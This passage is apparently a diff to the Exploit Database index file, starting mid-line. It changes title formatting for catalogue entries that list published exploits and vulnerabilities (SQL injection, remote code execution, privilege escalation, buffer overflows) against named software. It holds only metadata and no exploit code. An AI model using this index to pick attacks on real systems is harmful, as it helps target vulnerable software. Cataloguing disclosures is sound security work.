2.8.13 WebShot - Remote Code Execution (0day)",2014-06-24,@u0x,php,webapps,0 33852,platforms/windows/remote/33852.txt,"HTTP 1.1 GET Request Directory Traversal Vulnerability",2010-06-20,chr1x,windows,remote,0 33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 'module' Parameter Cross Site Scripting Vulnerability",2010-04-19,anT!-Tr0J4n,php,webapps,0 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module 'externalredirect.php' Cross-Site Scripting Vulnerability",2010-04-20,"Edgard Chammas",php,webapps,0 33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 'src/kdc/do_tgs_req.c' Ticket Renewal Double Free Memory Corruption Vulnerability",2010-04-20,"Joel Johnson",linux,remote,0 33856,platforms/php/webapps/33856.txt,"Viennabux Beta! 'cat' Parameter SQL Injection Vulnerability",2010-04-09,"Easy Laster",php,webapps,0 -33857,platforms/php/webapps/33857.txt,"e107 0.7.x 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0 +33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0 33858,platforms/php/webapps/33858.txt,"DBSite wb CMS 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0 33860,platforms/windows/dos/33860.html,"Internet Explorer 8, 9 & 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 33862,platforms/hardware/remote/33862.rb,"D-Link authentication.cgi Buffer Overflow",2014-06-24,metasploit,hardware,remote,80 @@ -30506,15 +30506,15 @@ id,file,description,date,author,platform,type,port 33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0 33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0 -33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure Vulnerability",2010-04-22,hkm,hardware,remote,0 +33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure Vulnerability",2010-04-22,hkm,hardware,remote,0 33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 'id' Parameter Cross Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0 -33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 Multiple Input Validation Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 +33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage 'RedirectUrl' Parameter URI Redirection Vulnerability",2010-04-25,"Aung Khant",multiple,remote,0 -33874,platforms/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 Multiple Security Vulnerabilities",2010-04-26,"Richard Moore",php,webapps,0 +33874,platforms/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Security Vulnerabilities",2010-04-26,"Richard Moore",php,webapps,0 33875,platforms/php/webapps/33875.txt,"HuronCMS 'index.php' Multiple SQL Injection Vulnerabilities",2010-03-30,mat,php,webapps,0 33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 remote DoS and arbitrary memory read",2007-09-14,mu-b,multiple,dos,0 -33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET <= 12.0 remote root exploit",2007-09-25,mu-b,multiple,remote,0 -33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET <= 12.0 remote SYSTEM exploit",2007-09-25,mu-b,multiple,remote,0 +33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET <= 12.0 remote root Exploit",2007-09-25,mu-b,multiple,remote,0 +33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET <= 12.0 remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0 33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP <= 13.0 remote DoS",2007-10-02,mu-b,multiple,dos,0 33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,metasploit,windows,remote,0 33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 'ComeUrl' Parameter Cross Site Scripting Vulnerability",2010-04-24,Liscker,php,webapps,0 @@ -30545,14 +30545,14 @@ id,file,description,date,author,platform,type,port 33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 'username' Parameter SQL Injection Vulnerability",2010-04-28,"John Leitch",php,webapps,0 33913,platforms/php/webapps/33913.html,"osCommerce 3.0a5 Local File Include and HTML Injection Vulnerabilities",2010-04-30,"Jordi Chancel",php,webapps,0 33914,platforms/php/webapps/33914.txt,"4xcms 'login.php' Multiple SQL Injection Vulnerabilities",2010-03-21,"cr4wl3r ",php,webapps,0 -33915,platforms/php/webapps/33915.txt,"Campsite 3.x 'article_id' Parameter SQL Injection Vulnerability",2010-04-30,"Stefan Esser",php,webapps,0 +33915,platforms/php/webapps/33915.txt,"Campsite 3.x - 'article_id' Parameter SQL Injection Vulnerability",2010-04-30,"Stefan Esser",php,webapps,0 33916,platforms/cfm/webapps/33916.txt,"Mango Blog 1.4.1 'archives.cfm/search' Cross Site Scripting Vulnerability",2010-05-03,MustLive,cfm,webapps,0 33917,platforms/php/webapps/33917.txt,"Billwerx RC5.2.2 PL2 'primary_number' Parameter SQL Injection Vulnerability",2010-05-02,indoushka,php,webapps,0 33918,platforms/php/webapps/33918.txt,"CF Image Hosting Script 1.1 'upload.php' Arbitrary File Upload Vulnerability",2010-05-01,The.Morpheus,php,webapps,0 33919,platforms/php/webapps/33919.txt,"NolaPro Enterprise 4.0.5538 Cross Site Scripting and SQL Injection Vulnerabilities",2010-05-01,ekse,php,webapps,0 33920,platforms/php/remote/33920.php,"PHP 5.3 'php_dechunk()' HTTP Chunked Encoding Integer Overflow Vulnerability",2010-05-02,"Stefan Esser",php,remote,0 33921,platforms/php/webapps/33921.txt,"IslamSound Multiple Remote SQL Injection Vulnerabilities",2010-05-03,JIKO,php,webapps,0 -33922,platforms/php/webapps/33922.txt,"CH-CMS.ch 2 Multiple Arbitrary File Upload Vulnerabilities",2010-03-15,EL-KAHINA,php,webapps,0 +33922,platforms/php/webapps/33922.txt,"CH-CMS.ch 2 - Multiple Arbitrary File Upload Vulnerabilities",2010-03-15,EL-KAHINA,php,webapps,0 33923,platforms/asp/webapps/33923.txt,"SamaGraph CMS 'inside.aspx' SQL Injection Vulnerability",2010-03-11,K053,asp,webapps,0 33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 'ClientCutText' Message Remote Denial of Service Vulnerability",2010-05-02,"John Leitch",windows,dos,0 33925,platforms/php/webapps/33925.txt,"ecoCMS 18.4.2010 'admin.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 @@ -30570,7 +30570,7 @@ id,file,description,date,author,platform,type,port 33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80 33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 - 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080 33944,platforms/windows/remote/33944.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.x Bypass (MS12-037)",2014-07-01,sickness,windows,remote,0 -33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x 'newpost.php' SQL Injection Vulnerability",2010-05-06,"Stefan Esser",php,webapps,0 +33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x - 'newpost.php' SQL Injection Vulnerability",2010-05-06,"Stefan Esser",php,webapps,0 33946,platforms/php/webapps/33946.txt,"EmiratesHost Insecure Cookie Authentication Bypass Vulnerability",2010-02-01,jago-dz,php,webapps,0 33947,platforms/php/webapps/33947.txt,"Last Wizardz 'id' Parameter SQL Injection Vulnerability",2010-01-31,"Sec Attack Team",php,webapps,0 33948,platforms/cfm/webapps/33948.txt,"Site Manager 3.0 'id' Parameter SQL Injection Vulnerability",2010-01-31,"Sec Attack Team",cfm,webapps,0 @@ -30589,11 +30589,11 @@ id,file,description,date,author,platform,type,port 33964,platforms/windows/remote/33964.txt,"X-Motor Racing 1.26 - Buffer Overflow and Multiple Denial of Service Vulnerabilities",2010-05-06,"Luigi Auriemma",windows,remote,0 33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 HTTP GET Request Denial Of Service Vulnerability",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data Denial Of Service Vulnerability",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 -33967,platforms/php/webapps/33967.txt,"Chipmunk Newsletter 2.0 Multiple Cross Site Scripting Vulnerabilities",2010-01-20,b0telh0,php,webapps,0 +33967,platforms/php/webapps/33967.txt,"Chipmunk Newsletter 2.0 - Multiple Cross Site Scripting Vulnerabilities",2010-01-20,b0telh0,php,webapps,0 33968,platforms/windows/dos/33968.pl,"Xitami 5.0 '/AUX' Request Remote Denial Of Service Vulnerability",2010-05-10,"Usman Saeed",windows,dos,0 -33969,platforms/php/webapps/33969.txt,"eFront 3.x 'ask_chat.php' SQL Injection Vulnerability",2010-05-09,"Stefan Esser",php,webapps,0 +33969,platforms/php/webapps/33969.txt,"eFront 3.x - 'ask_chat.php' SQL Injection Vulnerability",2010-05-09,"Stefan Esser",php,webapps,0 33970,platforms/php/webapps/33970.txt,"EasyPublish CMS 23.04.2010 URI Cross Site Scripting Vulnerability",2010-05-10,"High-Tech Bridge SA",php,webapps,0 -33971,platforms/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",windows,remote,0 +33971,platforms/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 - Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",windows,remote,0 33972,platforms/php/webapps/33972.txt,"Advanced Poll 2.0 'mysql_host' Parameter Cross Site Scripting Vulnerability",2010-05-10,"High-Tech Bridge SA",php,webapps,0 33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 '.asx' File Remote Denial of Service Vulnerability",2010-05-10,"Steve James",windows,dos,0 33974,platforms/windows/remote/33974.txt,"Mereo 1.9.1 Directory Traversal Vulnerability",2010-05-09,"John Leitch",windows,remote,0 @@ -30610,12 +30610,12 @@ id,file,description,date,author,platform,type,port 33985,platforms/php/webapps/33985.txt,"NPDS Revolution 10.02 'topic' Parameter Cross Site Scripting Vulnerability",2010-05-13,"High-Tech Bridge SA",php,webapps,0 33986,platforms/php/webapps/33986.txt,"PHP File Uploader Remote File Upload Vulnerability",2010-01-03,indoushka,php,webapps,0 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 'signupconfirm.php' Cross Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0 -33988,platforms/php/remote/33988.txt,"PHP 5.x 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0 +33988,platforms/php/remote/33988.txt,"PHP 5.x - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0 33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet Arbitrary File Upload",2014-07-07,metasploit,windows,remote,9002 33990,platforms/multiple/remote/33990.rb,"Gitlist Unauthenticated Remote Command Execution",2014-07-07,metasploit,multiple,remote,80 33991,platforms/php/remote/33991.rb,"Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload",2014-07-07,metasploit,php,remote,80 -33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 Multiple SQL Injection Vulnerabilities",2010-05-17,podatnik386,asp,webapps,0 -33993,platforms/php/webapps/33993.txt,"Planet Script 1.x 'idomains.php' Cross Site Scripting Vulnerability",2010-05-14,Mr.ThieF,php,webapps,0 +33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injection Vulnerabilities",2010-05-17,podatnik386,asp,webapps,0 +33993,platforms/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross Site Scripting Vulnerability",2010-05-14,Mr.ThieF,php,webapps,0 33994,platforms/php/webapps/33994.txt,"PonVFTP Insecure Cookie Authentication Bypass Vulnerability",2010-05-17,SkuLL-HackeR,php,webapps,0 33995,platforms/multiple/webapps/33995.txt,"Blaze Apps 1.x SQL Injection and HTML Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",multiple,webapps,0 33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Include Vulnerability",2014-07-07,Vulnerability-Lab,ios,webapps,0 @@ -30624,7 +30624,7 @@ id,file,description,date,author,platform,type,port 33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 'chatsmileys.php' Cross Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0 34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 BETA 'list' Parameter Cross Site Scripting Vulnerability",2010-01-18,indoushka,multiple,webapps,0 34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x Btrfs Cloned File Security Bypass Vulnerability",2010-05-18,"Dan Rosenberg",linux,local,0 -34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 Remote Buffer Overflow Vulnerability",2010-05-18,"fl0 fl0w",windows,remote,0 +34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow Vulnerability",2010-05-18,"fl0 fl0w",windows,remote,0 34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34004,platforms/php/webapps/34004.txt,"Percha Fields Attach 1.0 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 @@ -30649,11 +30649,11 @@ id,file,description,date,author,platform,type,port 34026,platforms/linux/remote/34026.py,"OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC",2014-07-10,EccE,linux,remote,0 34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 'in.ftpd' Long Command Handling Security Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 -34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0 +34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 - Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0 34030,platforms/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",lin_x86,webapps,0 34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 'editing_files.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 34032,platforms/php/webapps/34032.txt,"NPDS Revolution 10.02 'admin.php' Cross-Site Request Forgery Vulnerability",2010-05-20,"High-Tech Bridge SA",php,webapps,0 -34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0 +34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 - Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0 34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0 34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0 34037,platforms/win32/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege",2014-07-12,LiquidWorm,win32,local,0 @@ -30664,7 +30664,7 @@ id,file,description,date,author,platform,type,port 34043,platforms/php/webapps/34043.txt,"360 Web Manager 3.0 'webpages-form-led-edit.php' SQL Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34044,platforms/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script 'index.php' Cross Site Scripting Vulnerability",2010-05-26,indoushka,php,webapps,0 34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 'cat_id' Parameter SQL Injection Vulnerability",2010-05-27,"sniper ip",php,webapps,0 -34046,platforms/php/webapps/34046.txt,"BackLinkSpider 1.3.1774 Multiple Cross Site Scripting Vulnerabilities",2010-05-27,"sniper ip",php,webapps,0 +34046,platforms/php/webapps/34046.txt,"BackLinkSpider 1.3.1774 - Multiple Cross Site Scripting Vulnerabilities",2010-05-27,"sniper ip",php,webapps,0 34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) Cross Site Request Forgery Vulnerability",2010-05-26,"John Leitch",windows,remote,0 34048,platforms/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 'pbx/gate' Cross Site Request Forgery Vulnerability",2010-05-26,"John Leitch",multiple,remote,0 34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 SQL-Injection and Cross-Site Scripting Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0 @@ -30674,7 +30674,7 @@ id,file,description,date,author,platform,type,port 34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x 'admin.php' Multiple SQL Injection Vulnerabilities",2010-05-28,"High-Tech Bridge SA",php,webapps,0 34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 'page.php' Remote File Include Vulnerability",2010-05-30,eidelweiss,php,webapps,0 34055,platforms/php/webapps/34055.txt,"CMScout <= 2.08 Cross Site Scripting Vulnerability",2010-05-28,XroGuE,php,webapps,0 -34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0 +34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0 34057,platforms/php/webapps/34057.txt,"wsCMS 'news.php' Cross Site Scripting Vulnerability",2010-05-31,cyberlog,php,webapps,0 34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption Vulnerability",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0 34059,platforms/windows/remote/34059.py,"Kolibri WebServer 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0 @@ -30685,7 +30685,7 @@ id,file,description,date,author,platform,type,port 34065,platforms/hardware/remote/34065.rb,"D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",2014-07-14,metasploit,hardware,remote,1900 34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0 34067,platforms/php/webapps/34067.txt,"Smart Statistics 1.0 'smart_statistics_admin.php' Cross Site Scripting Vulnerability",2010-01-10,R3d-D3V!L,php,webapps,0 -34068,platforms/php/webapps/34068.html,"CMS Made Simple 1.x Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2010-01-01,"Truong Thao Nguyen",php,webapps,0 +34068,platforms/php/webapps/34068.html,"CMS Made Simple 1.x - Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2010-01-01,"Truong Thao Nguyen",php,webapps,0 34069,platforms/windows/dos/34069.html,"Microsoft Internet Explorer 8 CSS 'expression' Remote Denial of Service Vulnerability",2010-01-01,MustLive,windows,dos,0 34070,platforms/php/webapps/34070.txt,"Datetopia Match Agency BiZ Multiple Cross Site Scripting Vulnerabilities",2010-01-07,R3d-D3V!L,php,webapps,0 34071,platforms/php/webapps/34071.txt,"Joomla! 'com_sar_news' Component 'id' Parameter SQL Injection Vulnerability",2010-06-02,LynX,php,webapps,0 @@ -30694,11 +30694,11 @@ id,file,description,date,author,platform,type,port 34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti Insecure Cookie Authentication Bypass Vulnerability",2010-06-02,Septemb0x,php,webapps,0 34078,platforms/php/webapps/34078.txt,"PHP City Portal 1.3 'cms_data.php' Cross Site Scripting Vulnerability",2010-06-02,Red-D3v1L,php,webapps,0 34079,platforms/php/webapps/34079.txt,"Sniggabo CMS 2.21 'search.php' Cross Site Scripting Vulnerability",2010-01-06,Sora,php,webapps,0 -34080,platforms/cgi/webapps/34080.txt,"MoinMoin 1.x 'PageEditor.py' Cross-Site Scripting Vulnerability",2010-06-03,anonymous,cgi,webapps,0 +34080,platforms/cgi/webapps/34080.txt,"MoinMoin 1.x - 'PageEditor.py' Cross-Site Scripting Vulnerability",2010-06-03,anonymous,cgi,webapps,0 34081,platforms/php/webapps/34081.txt,"KubeLabs PHPDug 2.0 'upcoming.php' Cross Site Scripting Vulnerability",2010-01-06,indoushka,php,webapps,0 34082,platforms/php/webapps/34082.txt,"Obsession-Design Image-Gallery 1.1 'display.php' Cross Site Scripting Vulnerability",2010-01-02,kaMtiEz,php,webapps,0 34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 'lang' Parameter Cross-Site Scripting Vulnerabilities",2009-12-30,emgent,php,webapps,0 -34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0 +34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0 34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for Wordpress Cross Site Scripting Vulnerability",2010-06-04,MustLive,php,webapps,0 34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection Vulnerability",2014-07-16,"Pham Van Khanh",php,webapps,80 @@ -30722,13 +30722,13 @@ id,file,description,date,author,platform,type,port 34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Include Vulnerabilities",2010-06-03,"High-Tech Bridge SA",php,webapps,0 34110,platforms/php/webapps/34110.txt,"PG Auto Pro SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-09,Sid3^effects,php,webapps,0 34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection Vulnerabilities",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 -34112,platforms/windows/local/34112.txt,"Microsoft XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 +34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 File Renaming Security Bypass Vulnerability",2010-06-09,"John Leitch",php,webapps,0 34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component Cross Site Scripting Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 'page' Parameter Cross Site Scripting Vulnerability",2010-06-07,"Adam Baldwin",windows,remote,0 34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta showcase2search.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 -34118,platforms/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 Multiple Cross Site Scripting Vulnerabilities",2010-01-18,indoushka,php,webapps,0 +34118,platforms/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 - Multiple Cross Site Scripting Vulnerabilities",2010-01-18,indoushka,php,webapps,0 34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 addvideo.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 register.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 'search.php' Cross Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0 @@ -30738,7 +30738,7 @@ id,file,description,date,author,platform,type,port 34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80 34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0 34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection Vulnerability",2014-07-21,"Brandon Perry",linux,webapps,80 -34131,platforms/windows/local/34131.py,"Microsoft XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0 +34131,platforms/windows/local/34131.py,"Microsoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0 34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443 34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0 34134,platforms/lin_amd64/local/34134.c,"Linux Kernel - ptrace/sysret - Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0 @@ -30747,8 +30747,8 @@ id,file,description,date,author,platform,type,port 34137,platforms/php/webapps/34137.txt,"Joomla! 'com_videowhisper_2wvc' Component Cross Site Scripting Vulnerability",2010-06-10,Sid3^effects,php,webapps,0 34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat 'r' Parameter Cross Site Scripting Vulnerability",2010-06-14,Sid3^effects,php,webapps,0 34139,platforms/php/webapps/34139.txt,"Yamamah Photo Gallery 1.00 'download.php' Local File Disclosure Vulnerability",2010-06-13,mat,php,webapps,0 -34140,platforms/php/webapps/34140.txt,"AneCMS 1.x 'modules/blog/index.php' HTML Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0 -34141,platforms/php/webapps/34141.txt,"AneCMS 1.x 'modules/blog/index.php' SQL Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0 +34140,platforms/php/webapps/34140.txt,"AneCMS 1.x - 'modules/blog/index.php' HTML Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0 +34141,platforms/php/webapps/34141.txt,"AneCMS 1.x - 'modules/blog/index.php' SQL Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0 34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 'index.php' Multiple SQL Injection Vulnerabilities",2010-06-14,"High-Tech Bridge SA",php,webapps,0 34143,platforms/windows/remote/34143.txt,"XnView <= 1.97.4 - MBM File Remote Heap Buffer Overflow Vulnerability",2010-06-14,"Mauro Olea",windows,remote,0 34144,platforms/php/webapps/34144.txt,"Joomla! 'com_easygb' Component 'Itemid' Parameter Cross Site Scripting Vulnerability",2010-06-08,"L0rd CrusAd3r",php,webapps,0 @@ -30756,7 +30756,7 @@ id,file,description,date,author,platform,type,port 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0 34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 'username' Parameter Cross Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0 34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0 -34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure vulnerability",2014-07-23,"Dolev Farhi",hardware,webapps,0 +34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure Vulnerability",2014-07-23,"Dolev Farhi",hardware,webapps,0 